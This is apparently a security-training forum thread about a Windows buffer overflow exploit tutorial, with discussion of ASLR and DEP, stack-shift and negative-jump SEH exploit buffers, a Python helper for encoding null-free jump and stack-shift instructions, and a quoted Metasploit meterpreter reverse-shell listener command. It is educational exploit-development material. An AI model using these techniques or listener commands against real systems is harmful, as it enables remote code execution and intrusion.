matugm

Matu's exploit guide!

Recommended Posts

Omega

I like that idea... perhaps we should find some good challenges for this. On that note, have you tried a go at the new Gold cert? You just may like it... :)

Also... perhaps you should update your location to something Kali specific :-D

Yeah, of course. Thanks :) I will take the Gold Cert soon :) Busy in real life.

Chris:/*

This is a very well done piece, I see a number of concepts laid out well that normally take a couple of books to explain. Nice Job!

roger.g

I have a question about this tutorial.

I tried the tutorial on a 64-bit computer with Windows 7 installed.

When I try to send 500 A's or 5 A's, the application gives me a full network error.

I tried it on Windows XP 64-bit and everything works.

Is it that for this kind of thing Windows XP is better than Windows 7?

Dan.North

Believe Windows 7 has ASLR (Address Space Layout Randomisation) & DEP (Data Execution Prevention) enabled by default.

I believe this means the memory isn't always loaded into the same area of virtual memory every time, meaning a set exploit won't always work. Also, even if it would, DEP stops it being executed from the stack.**

Would be good to get some good tutorials on bypassing some of this as I believe there are methods to do it (egghunters etc.).

** = this is a really basic and probably poor explanation but should give you something to look into

schuydorsey

ASLR is enabled on Vista and Server 2008 and above by default. The default setting for DEP is to only be enabled on core Windows programs/processes. You have to manually enable DEP for the rest of the processes.

This is covered from a defensive standpoint in PND. ;)

Dan.North

haha I'm not there yet..... But that's useful to know as I'd just assumed it'd be enabled by default :o

Is that down to backwards compatibility? Some programs maybe executing instructions from there?

Just seems strange to not enable it :o

schuydorsey

A LOT of third party programs are insecurely coded and DEP breaks them. About 1/2 of my client sites where I have deployed EMET/DEP, I find a vendor support application that is broken because the vendor executed instructions from the stack without marking that area as executable. Sometimes the vendor is willing to fix their program.. sometimes they aren't.

_VL_

Great thread. Just got a chance to read through it.

jander42

Great Introduction, could you re-upload those pictures?

If the person who started this thread is still around ofc :P

herman

I recently started to dive into memory exploitation and worked through Stack BoF, SEH Stack BoF, Heap Spraying and Egg Hunter examples. If there is an interest I will throw the general exploitation process here, but I would have to gather some screenshots and images.

A few handy things I came across (source: corelan.be / youtube):

- Stack BoF Exploit Reliability -

Add a "Prepend" or "Stack Shift". Often used on Windows exploits to make room on the stack for the decoder to properly decode the payload / shellcode. Also prevents the exploit from being corrupted by any data on the stack.

Example:

prepend = "\x81\xC4\xFF\xEF\xFF\xFF"  # add esp, -1001h (4097)
prepend += "\x44"  # inc esp

In case you're wondering why they use -1001 and then increase esp again to -1000, the opcode for add esp,-1000 contains a null byte.

Exploit will look like: [enough junk to overwrite EIP][call esp addr][$prepend][INT3][shellcode]

Create the correct instruction by using metasm in Metasploit. Example:
metasm > add esp,-450
"\x81\xc4\x3e\xfe\xff\xff"

- What to do if space for a payload is limited? -

  • Use a "staged" Metasploit payload as they require less space
  • Use a different (or no) encoding of the payload
  • Use an egg hunter (summary: the payload can be located anywhere in memory, we put a tag in front of it, and on exploitation we search for it in memory). Drawback: 100% CPU utilization, try to use it as a last resort
  • Use a negative jump: this only works if we have enough space at the beginning, for example a SEH BoF

Example:
We overwrite 4403 bytes before we reach the SEH handler. This space can be used to place our payload but we must jump back to it. Some pseudo-code:

import struct

distance_to_seh = [value]  # e.g. 4403
eip = [poppopret]  # an instruction from a target lib is preferred over an OS lib
shellcode = [array of shellcode]  # our payload
pad = "\x90" * (distance_to_seh - len(shellcode))  # adds NOP sled before payload
jmp_min = "\xE9\x98\xEF\xFF\xFF"  # goes back 4000 bytes to land in the NOP sled

buf = pad + shellcode + struct.pack('<I', eip) + jmp_min  # ready to exploit

That's all folks... Keep on learning ^_^
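As an added example (my own code, not herman's and not from corelan.be), here is a small Python helper that does the arithmetic behind the two tricks above instead of trusting hand-copied bytes: it encodes `add esp, imm32` and `jmp rel32` for 32-bit x86, checks the encoding for null bytes (which is why the post shifts by -1001h and then does `inc esp`), and, following the post's `pad + shellcode + handler + jmp` layout, computes where a negative jmp lands so you can confirm it falls inside the NOP sled before relying on it. Function names and the `handler_size` parameter are my assumptions; the 4403-byte distance and the byte strings are the ones quoted in the post.

```python
import struct

# Added example, not code from the post: 32-bit x86 encoders for the two
# instructions discussed above, a null-byte check, and a layout check for
# the negative-jump SEH buffer. All function names are mine.


def encode_add_esp(imm: int) -> bytes:
    """add esp, imm32  ->  81 C4 <imm32 little-endian, sign-extended>."""
    return b"\x81\xc4" + struct.pack("<i", imm)


def encode_jmp_rel32(displacement: int) -> bytes:
    """jmp rel32  ->  E9 <rel32>; rel32 counts from the END of this 5-byte instruction."""
    return b"\xe9" + struct.pack("<i", displacement)


def decode_jmp_rel32(code: bytes) -> int:
    """Recover the signed displacement from an E9 jmp."""
    if len(code) != 5 or code[0] != 0xE9:
        raise ValueError("not a 5-byte jmp rel32")
    return struct.unpack("<i", code[1:])[0]


def has_null(code: bytes) -> bool:
    """A 0x00 byte terminates a C-string copy, so these encodings must avoid it."""
    return b"\x00" in code


def stack_shift(size: int) -> bytes:
    """Build a stack shift of `size` bytes (add esp, -size).
    If that encoding contains a null byte, shift one byte further and fix it up
    with `inc esp` (0x44): exactly the -1001h / inc esp trick from the post."""
    direct = encode_add_esp(-size)
    if not has_null(direct):
        return direct
    fixed = encode_add_esp(-(size + 1)) + b"\x44"  # inc esp
    if has_null(fixed):
        raise ValueError(f"no null-free encoding found for a shift of {size}")
    return fixed


def jmp_back(bytes_back: int) -> bytes:
    """jmp whose target lies `bytes_back` bytes before the START of the jmp itself.
    rel32 is measured from the end of the instruction, so subtract its 5-byte length."""
    return encode_jmp_rel32(-bytes_back - 5)


def landing_offset(distance_to_seh: int, jmp: bytes, handler_size: int = 4) -> int:
    """Buffer offset the jmp lands on, following the post's layout
    pad + shellcode + handler + jmp: the jmp starts at distance_to_seh + handler_size.
    (handler_size is an assumption: one 32-bit address.)"""
    jmp_start = distance_to_seh + handler_size
    return jmp_start + len(jmp) + decode_jmp_rel32(jmp)


def lands_in_sled(distance_to_seh: int, shellcode_len: int, jmp: bytes) -> bool:
    """True when the jump target falls inside the NOP sled (pad) before the shellcode."""
    sled_len = distance_to_seh - shellcode_len
    return 0 <= landing_offset(distance_to_seh, jmp) < sled_len


if __name__ == "__main__":
    direct = encode_add_esp(-0x1000)
    print("add esp,-1000h   :", direct.hex(), "| contains null byte:", has_null(direct))
    print("stack_shift(1000h):", stack_shift(0x1000).hex())
    print("add esp,-450     :", encode_add_esp(-450).hex())
    post_jmp = b"\xE9\x98\xEF\xFF\xFF"  # bytes quoted in the post
    print("post jmp displacement:", decode_jmp_rel32(post_jmp),
          "| lands at buffer offset", landing_offset(4403, post_jmp))
```

Running it reproduces the two metasm results from the post (`81 c4 ff ef ff ff 44` for the shifted -1001h plus `inc esp`, and `81 c4 3e fe ff ff` for `add esp,-450`) and shows why the direct `add esp,-1000h` is rejected. Decoding the five jmp bytes quoted above gives the displacement they actually encode (-4200 from the end of the instruction), and `lands_in_sled` tells you whether that target sits in the pad for a given shellcode length; for the 4403-byte distance the landing offset is 212, so the sled must be longer than that.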
 

 

Francesco

Great :) It's always nice to see you guys sharing tuts/guides!

Corelan exploit writing tutorials are really great. Here are a few other resources worth reading.

If you are going to dig deeper into SEH this is also a valid resource.

Keep up the good work herman!

ryan.collins

I'm sure this is a great tutorial, but all i'm seeing for code snippets is 

msfcli multi/handler LHOST=192.168.1.15 LPORT=443 payload=windows/meterpreter/reverse_tcp E

Every place where you list a command I just see that same msfcli line. Maybe it's just my browser or something :( 
